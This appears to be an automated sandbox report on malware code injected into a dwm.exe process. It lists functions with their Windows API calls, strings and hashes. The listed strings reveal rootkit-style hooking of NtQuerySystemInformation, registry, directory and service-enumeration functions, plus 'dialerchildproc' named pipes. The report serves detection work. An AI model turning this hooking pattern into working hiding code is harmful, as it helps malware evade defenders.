API String ID: 1666949209-0
Opcode ID: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
Instruction ID: 64ae611a4921262f5263e1d10b2c741a634708e72a66558dddc3f4bb6321254c
Opcode Fuzzy Hash: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
Instruction Fuzzy Hash: 7CD19A76208B8885DA70DB59E49839A7BA0F788F84F100126EBCD87FA5DF7CC651DB50

Function 000002311E403878 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 000002311E403886
GetCurrentProcess.KERNEL32 ref: 000002311E4038B4
VirtualProtectEx.KERNEL32 ref: 000002311E4038D6
GetCurrentProcess.KERNEL32 ref: 000002311E4038F4
VirtualProtectEx.KERNEL32 ref: 000002311E403915

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 4b975b153568da779795242322487298ba959dd63a5a8062f828e0d535dbc4cd
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 84112A3A704B4082EF149B91F4082AA6BA0F748F84F050039DFCD87B94EE7DD614D710

Function 000002311E4051B0 Relevance: 4.8, APIs: 3, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000002311E405236

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
Instruction ID: 9332118a008d7569771034cac7ba51eb92c084066515269ece57c1523346b284
Opcode Fuzzy Hash: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
Instruction Fuzzy Hash: C102BB36219B8086E760DB95E49439ABBA0F3C4B94F104125EBCE87FA8DFBCC554DB50

Function 000002311E403AC0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000002311E403B46
VirtualAlloc.KERNEL32 ref: 000002311E403B80

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction ID: 0cdf8ce9afc29be012f47d7741a52d889a3768b2fde010593ac44c7d33a2c63b
Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction Fuzzy Hash: AD31BF31219A4481EA70DA95E4583DB6FA4F388B88F100535A7CD86F99DFBDC7A09B14

Function 000002311E403458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002311E40347A
PathFindFileNameW.SHLWAPI ref: 000002311E403489

Part of subcall function 000002311E403930: StrCmpNIW.SHLWAPI ref: 000002311E403948

Part of subcall function 000002311E403878: GetModuleHandleW.KERNEL32 ref: 000002311E403886
Part of subcall function 000002311E403878: GetCurrentProcess.KERNEL32 ref: 000002311E4038B4
Part of subcall function 000002311E403878: VirtualProtectEx.KERNEL32 ref: 000002311E4038D6
Part of subcall function 000002311E403878: GetCurrentProcess.KERNEL32 ref: 000002311E4038F4
Part of subcall function 000002311E403878: VirtualProtectEx.KERNEL32 ref: 000002311E403915

CreateThread.KERNEL32 ref: 000002311E4034D7

Part of subcall function 000002311E401EB4: GetCurrentThread.KERNEL32 ref: 000002311E401EBF

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: db7b6419cb2e85fe0d2eec0f47b6c55b443f253ed02242e24e53d1e6ee5fe43d
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: F111793071060182FB2197A2A90E7DA2F90A744F14F440038ABCEC9994EFFCE264A230

Function 000002311E404ED0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000002311E404ED4
VirtualProtect.KERNEL32 ref: 000002311E404F17
FlushInstructionCache.KERNEL32 ref: 000002311E404F2C

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
Instruction ID: 0d14c7ba0fdd593e31395c8c55a107d0f4cc00ff13625c4c7b27d2bfaebd7dcd
Opcode Fuzzy Hash: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
Instruction Fuzzy Hash: 3BF0BD76218A4481D630EB85E4597CA6BA0E388BD4F144125BACD87F69DE7CC7A09B10

Function 000002311E401C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002311E401650: GetProcessHeap.KERNEL32 ref: 000002311E40165B
Part of subcall function 000002311E401650: HeapAlloc.KERNEL32 ref: 000002311E40166A
Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E4016DA
Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E401707
Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E401721
Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E401741
Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E40175C
Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E40177C
Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E401797
Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E4017B7
Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E4017D2
Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E4017F2

Sleep.KERNEL32 ref: 000002311E401C43
SleepEx.KERNELBASE ref: 000002311E401C49

Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E40180D
Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E40182D
Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E401848
Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E401868
Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E401883
Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E4018A3
Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E4018BE
Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E4018C8

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 96104da9dbf93974a69303edefa94b2bc70598b286cf9c6aad2029f578bf7f00
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: A431CC3530060191FB519BA6E9493DA1AE5AB44FC0F045431EFCDC7FD6EEA8EA71A270

Function 000002311E3D2908 Relevance: 1.4, APIs: 1, Instructions: 186
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000002311E3D29AA

Memory Dump Source

Source File: 0000001D.00000002.12893803186.000002311E3D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E3D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e3d0000_dwm.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 56cfb7e99d97c3f2bad38467cd5cb5a8c5422388c8e0f790564bc0e88b7ddf38
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 1E61453272165083EB68CFA5D4447ADB395FB04FA4F949011DB9D07784DBBEDA62C720

Function 000002311E432908 Relevance: 1.4, APIs: 1, Instructions: 186
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000002311E4329AA

Memory Dump Source

Source File: 0000001D.00000002.12894078896.000002311E430000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002311E430000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e430000_dwm.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: c442ebf0386bea5e17d313f54559d349e12ee33d9836c68515ff57e5528e0d32
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 2F61413230966083EA68CF95D4487ADB395FB04F94F148121DB9D87F84DB7CEA62D728

Non-executed Functions

Function 000002311E402CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000002311E402D80
lstrlenW.KERNEL32 ref: 000002311E402FBA

Part of subcall function 000002311E401A14: OpenProcess.KERNEL32 ref: 000002311E401A3A
Part of subcall function 000002311E401A14: K32GetModuleFileNameExW.KERNEL32 ref: 000002311E401A58
Part of subcall function 000002311E401A14: PathFindFileNameW.SHLWAPI ref: 000002311E401A67
Part of subcall function 000002311E401A14: lstrlenW.KERNEL32 ref: 000002311E401A73
Part of subcall function 000002311E401A14: StrCpyW.SHLWAPI ref: 000002311E401A86
Part of subcall function 000002311E401A14: CloseHandle.KERNEL32 ref: 000002311E401A94

GetProcAddress.KERNEL32 ref: 000002311E402D95

Part of subcall function 000002311E401554: StrCmpIW.SHLWAPI ref: 000002311E401585

Part of subcall function 000002311E403930: StrCmpNIW.SHLWAPI ref: 000002311E403948

StrCmpNIW.SHLWAPI ref: 000002311E402DD8
lstrlenW.KERNEL32 ref: 000002311E402F00

Strings

\Device\Nsi, xrefs: 000002311E402DCB
ntdll.dll, xrefs: 000002311E402D79
NtQueryObject, xrefs: 000002311E402D8B

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: ffa012dfacf06c0e0277ad5cc3e3960543eb1ed7403fd1209b85f3ca89f36216
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: D4B1A032211A5081EB648FA5D4487DA6BA4FB44F88F445026EF8D93F95DFBDCE60E360

Function 000002311E407E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002311E407E8C
RtlCaptureContext.NTDLL ref: 000002311E407EB9
RtlLookupFunctionEntry.NTDLL ref: 000002311E407ED3
RtlVirtualUnwind.NTDLL ref: 000002311E407F14
IsDebuggerPresent.KERNEL32 ref: 000002311E407F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000002311E407F89
UnhandledExceptionFilter.KERNEL32 ref: 000002311E407F94

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 12e2d05924369c7efa40a4016ee0df7ea50cb11fa791cd560efc2cf45d24bce0
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: EC311A72205B8096EB60DFA0E8487E97764F784B44F44442ADB8D87A98EF78C658D724

Function 000002311E40B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002311E40B585
RtlLookupFunctionEntry.NTDLL ref: 000002311E40B59D
RtlVirtualUnwind.NTDLL ref: 000002311E40B5D8
IsDebuggerPresent.KERNEL32 ref: 000002311E40B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000002311E40B61B
UnhandledExceptionFilter.KERNEL32 ref: 000002311E40B626

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 940d15617fde96df2004dfbba38bc143d1f4a35a9ee91096b5a3ddcb93d0b9cc
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 73314C32214F8086EB60DF65E8483DE77A4F788B58F500526EB9D87F94DF78C6658B10

Function 000002311E40FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002311E40FF67
WriteFile.KERNEL32 ref: 000002311E41021E
WriteFile.KERNEL32 ref: 000002311E410270
GetLastError.KERNEL32 ref: 000002311E410372
GetLastError.KERNEL32 ref: 000002311E4103D2

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: c847ea2086e2666ca3497c700a05274657f92f3b49a0e5c06f73f2e4e9b60f10
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 2CE1F232B04A809AEB10CFA4D4883DD7BB1F345B88F144516EF8E97F99DA78D626D710

Function 000002311E4012C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002311E401326
GetProcessHeap.KERNEL32 ref: 000002311E401334
HeapAlloc.KERNEL32 ref: 000002311E401345
RegEnumValueW.ADVAPI32 ref: 000002311E4013A1

Part of subcall function 000002311E401554: StrCmpIW.SHLWAPI ref: 000002311E401585

GetProcessHeap.KERNEL32 ref: 000002311E4013E9
HeapAlloc.KERNEL32 ref: 000002311E4013F7
GetProcessHeap.KERNEL32 ref: 000002311E40141B
HeapFree.KERNEL32 ref: 000002311E401429
lstrlenW.KERNEL32 ref: 000002311E401432
GetProcessHeap.KERNEL32 ref: 000002311E401440
HeapAlloc.KERNEL32 ref: 000002311E40144E
StrCpyW.SHLWAPI ref: 000002311E401470
GetProcessHeap.KERNEL32 ref: 000002311E401485
HeapFree.KERNEL32 ref: 000002311E401493

Strings

d, xrefs: 000002311E401365

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 0c5245eebcc377e824a7865881c30902e1d19b893a8a37759076046afcaee781
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: ED515872204B4492EB14CFA2E5483DABBA1F788F90F058124DB8D87B24DFBCE665D710

Function 000002311E401EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002311E401EBF

Part of subcall function 000002311E402174: GetModuleHandleA.KERNEL32 ref: 000002311E40218C
Part of subcall function 000002311E402174: GetProcAddress.KERNEL32 ref: 000002311E40219D

Part of subcall function 000002311E405C10: GetCurrentThreadId.KERNEL32 ref: 000002311E405C4B

Strings

ntdll.dll, xrefs: 000002311E401ECD
NtEnumerateValueKey, xrefs: 000002311E401F76
advapi32.dll, xrefs: 000002311E401F97, 000002311E401FB8
EnumServiceGroupW, xrefs: 000002311E401F90
NtDeviceIoControlFile, xrefs: 000002311E401FF6
NtQueryDirectoryFile, xrefs: 000002311E401F1F
NtResumeThread, xrefs: 000002311E401F02
NtEnumerateKey, xrefs: 000002311E401F59
EnumServicesStatusExW, xrefs: 000002311E401FB1, 000002311E401FD2
NtQueryDirectoryFileEx, xrefs: 000002311E401F3C
sechost.dll, xrefs: 000002311E401FD9
NtQuerySystemInformation, xrefs: 000002311E401EE5

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 8c9cad52cf33e3c0d4c1cfaf5b4717b826cea9d09bc4a2419ffeeb56652d4626
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: AA31C564310906A0EE14EFE4E8596D42771B744F84F804423A78D86DA2AEBCE369F3B4

Function 000002311E4023F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002311E402405
GetCurrentProcessId.KERNEL32 ref: 000002311E40240F

Part of subcall function 000002311E4019AC: OpenProcess.KERNEL32 ref: 000002311E4019CA
Part of subcall function 000002311E4019AC: IsWow64Process.KERNEL32 ref: 000002311E4019E0
Part of subcall function 000002311E4019AC: CloseHandle.KERNEL32 ref: 000002311E4019FB

CreateFileW.KERNEL32 ref: 000002311E402468
WriteFile.KERNEL32 ref: 000002311E402490
ReadFile.KERNEL32 ref: 000002311E4024AF
CloseHandle.KERNEL32 ref: 000002311E4024B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 000002311E402438
\\.\pipe\dialerchildproc32, xrefs: 000002311E40243F

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: b43173b5175a63e1ea311b7b9f40bc169f782f92b161f0e26ab92fcbedf3d6d2
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 3E211A36714A4082EB10CB65E54839A6BA0F789FA4F504215EB9D82FA8DFBCD259DB10

Function 000002311E40D2CC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 127libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 000002311E40D424

Strings

api-ms-, xrefs: 000002311E40D391
ext-ms-, xrefs: 000002311E40D3A4

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: AddressProc
String ID: api-ms-$ext-ms-
API String ID: 190572456-537541572
Opcode ID: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
Instruction ID: ebc3b4a4140b2f35f6b986a80ecd9d59742e79376495863dbad7ed8d8cc43b7b
Opcode Fuzzy Hash: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
Instruction Fuzzy Hash: 2241D27131164086FE15DF96A8083DD2A91B708FE0F0959399FCDCBB84DABCD629A320

Function 000002311E40104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002311E4010AB
RegEnumValueW.ADVAPI32 ref: 000002311E40110E
GetProcessHeap.KERNEL32 ref: 000002311E401155
HeapAlloc.KERNEL32 ref: 000002311E401163
GetProcessHeap.KERNEL32 ref: 000002311E401187
HeapFree.KERNEL32 ref: 000002311E401195

Strings

d, xrefs: 000002311E4010CE

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: fdadaceb8aae016d654d229f64f4b9ba58908a6f41e159a61f1ec3b4232faf6f
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 24414F73614B8097EB648F91E4487DABBA1F389B84F008125DBC947B58DF7CE665CB10

Function 000002311E409804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000002311E409889
GetLastError.KERNEL32 ref: 000002311E409897
LoadLibraryExW.KERNEL32 ref: 000002311E4098C1
FreeLibrary.KERNEL32 ref: 000002311E409907
GetProcAddress.KERNEL32 ref: 000002311E409913

Strings

api-ms-, xrefs: 000002311E4098A9

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 6757967f72e0bf41d61ef33d04c5e0070346b96b0374b0384ce59ab21a0fa50d
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 9D31E93671264091FE11DB82A4087D96B94B788FA4F1E4534DFAD87B94DF7CD2649320

Function 000002311E411B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002311E411BCD
GetLastError.KERNEL32 ref: 000002311E411BD9
CloseHandle.KERNEL32 ref: 000002311E411BF1
CreateFileW.KERNEL32 ref: 000002311E411C1C
WriteConsoleW.KERNEL32 ref: 000002311E411C3B

Strings

CONOUT$, xrefs: 000002311E411BFD

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 7da6fc98da9e409b1bda3d8e867def4bbf2ef8fbbd32ae5beb958edb4b9c405e
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: F2118221314F5086EB509B96E84835976A0F788FE4F044224EB9EC7F98DFBCD6249754

Function 000002311E4030B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002311E4030D7
HeapAlloc.KERNEL32 ref: 000002311E4030EA
StrCmpNIW.SHLWAPI ref: 000002311E40316B
GetProcessHeap.KERNEL32 ref: 000002311E4031D1
HeapFree.KERNEL32 ref: 000002311E4031DF

Strings

dialer, xrefs: 000002311E403164

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: db0063c46e893986c85aa5a181160c779074c189744ddf5a5afcd768ff38a55c
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 85317131701B51D2EA15DF96A8486EA6BA0FB48F84F0841349FCC8BF55EB7CE6B19710

Function 000002311E401A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002311E401A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000002311E401A58
PathFindFileNameW.SHLWAPI ref: 000002311E401A67
lstrlenW.KERNEL32 ref: 000002311E401A73
StrCpyW.SHLWAPI ref: 000002311E401A86
CloseHandle.KERNEL32 ref: 000002311E401A94

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
